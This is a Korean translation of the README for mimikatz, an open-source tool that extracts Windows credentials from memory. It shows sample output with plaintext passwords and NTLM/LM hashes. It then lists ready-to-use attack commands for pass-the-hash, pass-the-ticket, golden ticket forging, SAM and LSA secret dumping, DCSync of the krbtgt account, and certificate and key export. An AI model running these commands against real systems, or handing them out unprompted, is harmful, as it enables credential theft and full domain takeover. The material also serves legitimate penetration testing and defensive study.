
메모리에서 Windows 자격 증명(비밀번호, 해시, Kerberos 티켓)을 추출하고 pass-the-hash, pass-the-ticket, golden ticket 공격을 수행하기 위한 도구입니다.
**mimikatz**은 제가 C 언어를 배우고 Windows 보안에 대한 몇 가지 실험을 하기 위해 만든 도구입니다.
이제 메모리에서 평문 비밀번호, 해시, PIN 코드 및 Kerberos 티켓을 추출하는 것으로 잘 알려져 있습니다. **mimikatz**은(는) pass-the-hash, pass-the-ticket을 수행하거나 _Golden tickets_을 생성할 수도 있습니다.
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
하지만 그게 전부가 아닙니다! Crypto, Terminal Server, Events, ... GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki 또는 http://blog.gentilkiwi.com (프랑스어, 네)에서 많은 정보를 확인할 수 있습니다.
직접 빌드하고 싶지 않다면 바이너리는 https://github.com/gentilkiwi/mimikatz/releases 에서 다운로드할 수 있습니다.
log
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz은(는) Visual Studio 솔루션과 WinDDK 드라이버(주요 작업에는 선택 사항) 형태로 제공되므로 사전 요구 사항은 다음과 같습니다:
mimikatz 및 mimilib : Visual Studio 2010, 2012 또는 2013 for Desktop (2013 Express for Desktop은 무료이며 x86 및 x64를 지원합니다 - http://www.microsoft.com/download/details.aspx?id=44914)mimikatz 드라이버, mimilove (및 ddk2003 플랫폼) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800mimikatz은(는) 소스 관리를 위해 SVN을 사용하지만 이제 GIT에서도 사용할 수 있습니다!
동기화에는 Visual Studio 2013에 내장된 GIT을 포함한 어떤 도구든 사용할 수 있습니다 =)
Build / Build Solution을 실행합니다 (아키텍처를 변경할 수 있습니다)mimikatz이(가) 빌드되어 사용할 준비가 되었습니다! (Win32 / x64, 운이 좋다면 ARM64도 가능)
_build_.cmd 및 mimidrv와 관련된 MSB3073 오류가 발생할 수 있습니다. 이는 Windows Driver Kit 7.1 (WinDDK) 없이는 드라이버를 빌드할 수 없기 때문이지만, mimikatz 및 mimilib은(는) 정상입니다.이 선택적 MSBuild 플랫폼을 사용하면 WinDDK 빌드 도구와 기본 msvcrt 런타임(더 작은 바이너리, 종속성 없음)을 사용할 수 있습니다.
이 선택적 플랫폼에는 Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 및 Visual Studio 2010이 필수입니다. 이후 Visual Studio 2012 또는 2013을 사용할 계획이더라도 마찬가지입니다.
지침을 따르세요:
CC BY 4.0 라이선스 - https://creativecommons.org/licenses/by/4.0/
mimikatz은(는) 개발을 위해 커피가 필요합니다:
gentilkiwi, Twitter( @gentilkiwi ) 또는 이메일( benjamin [at] gentilkiwi.com )로 연락할 수 있습니다.lsadump 모듈의 DCSync 및 DCShadow 기능은 Vincent LE TOUX와 공동 작성했습니다. 이메일( vincent.letoux [at] gmail.com ) 또는 웹사이트( http://www.mysmartlogon.com )로 연락할 수 있습니다.이것은 개인적인 개발이므로 그 철학을 존중하고 나쁜 일에 사용하지 마세요!